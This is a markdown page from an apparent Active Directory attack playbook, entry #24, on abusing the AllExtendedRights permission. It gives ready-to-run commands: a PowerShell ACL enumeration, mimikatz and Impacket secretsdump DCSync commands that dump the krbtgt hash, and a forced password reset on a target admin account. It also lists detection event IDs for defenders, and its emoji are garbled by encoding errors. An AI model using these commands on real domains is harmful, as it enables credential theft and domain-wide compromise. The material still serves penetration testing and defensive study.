attack-24-allextendedrights-dcsync-ace-abuse.md (4299B)
1 --- 2 title: "Attack #24 โ AllExtendedRights DCSync ACE Abuse" 3 description: "AllExtendedRights is a blanket permission that grants every extended right on an AD object. When applied to the domain root object, this includes the twoโฆ" 4 category: active-directory 5 subcategory: "ACL Abuse" 6 tags: ["active-directory", "credential-access", "delegation"] 7 tools: ["Impacket", "Mimikatz", "BloodHound", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ก Attack #24 โ AllExtendedRights DCSync ACE Abuse.md" 11 --- 12 # ๐ก Attack #24 โ AllExtendedRights / DCSync ACE Abuse 13 14 *** 15 16 ## ๐ How It Works 17 18 `AllExtendedRights` is a blanket permission that grants **every extended right** on an AD object. When applied to the **domain root object**, this includes the two critical replication rights: `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` โ which is everything needed for DCSync. Unlike WriteDACL (where you ADD new ACEs), AllExtendedRights means you **already have** the DCSync permission implicitly โ you can immediately run DCSync without any DACL modification. 19 20 This permission is also dangerous on user objects, where it grants `User-Force-Change-Password` (password reset) and `User-Change-Password` among other extended rights. 21 22 ### AllExtendedRights Impact by Target 23 24 | Target | Extended Rights Granted | Impact | 25 |---|---|---| 26 | **Domain root object** | DS-Replication-Get-Changes + All | Immediate DCSync capability | 27 | **User object** | User-Force-Change-Password | Password reset without knowing current password | 28 | **Computer object** | Various | Read LAPS password, modify delegation | 29 | **Any object** | All extended rights for that object class | Full extended right access | 30 31 *** 32 33 ## โ๏ธ Prerequisites 34 35 | Requirement | Detail | 36 |---|---| 37 | **AllExtendedRights on domain root** | For DCSync โ check via BloodHound or PowerView | 38 | **Domain user account** | The principal with AllExtendedRights | 39 40 *** 41 42 ## ๐ป Full Commands 43 44 ### ๐ต Enumerate AllExtendedRights 45 46 ```powershell 47 # โโ Find who has AllExtendedRights on the domain root โโโโโโโโโโโโโโโโโโโโโโโโโ 48 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | 49 Where-Object { $_.ActiveDirectoryRights -match "ExtendedRight" -and 50 $_.ObjectAceType -eq "00000000-0000-0000-0000-000000000000" } | 51 ForEach-Object { 52 $_ | Add-Member -NotePropertyName Principal -NotePropertyValue ( 53 Convert-SidToName $_.SecurityIdentifier 54 ) -PassThru 55 } | Select-Object Principal, ActiveDirectoryRights 56 # ObjectAceType of all zeros = AllExtendedRights 57 ``` 58 59 ### ๐ด Immediate DCSync (No ACL Modification Needed) 60 61 ```powershell 62 # โโ If you have AllExtendedRights on domain root, just DCSync โโโโโโโโโโโโโโโโโ 63 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit 64 ``` 65 66 ```bash 67 # โโ Linux โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 68 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local -just-dc-user krbtgt 69 # This works directly because AllExtendedRights = has replication rights 70 ``` 71 72 ### ๐ด AllExtendedRights on User โ Password Reset 73 74 ```powershell 75 Set-DomainUserPassword -Identity targetadmin -AccountPassword ( 76 ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force 77 ) 78 ``` 79 80 *** 81 82 ## ๐ก๏ธ Detection โ Event IDs 83 84 | Event ID | Source | What to Look For | 85 |---|---|---| 86 | **4662** | Security Log (DC) | Replication rights used โ same as DCSync detection | 87 | **4724** | Security Log (DC) | Password reset (if used on user objects) | 88 89 *** 90 91 ## ๐ Attack Chain Context 92 93 ``` 94 [AllExtendedRights] โโโ Immediate DCSync or Password Reset 95 โ 96 โโโโ ๐ฉธ On domain root โ DCSync without any ACL modification 97 โโโโ ๐ On user โ password reset 98 โโโโ ๐ Differs from WriteDACL: no need to ADD rights, you already HAVE them 99 โโโโ ๐ Defeated by: audit who has AllExtendedRights, limit to legitimate accounts 100 ``` 101 102 *** 103 104 > โ **Attack #24 โ AllExtendedRights Abuse complete.**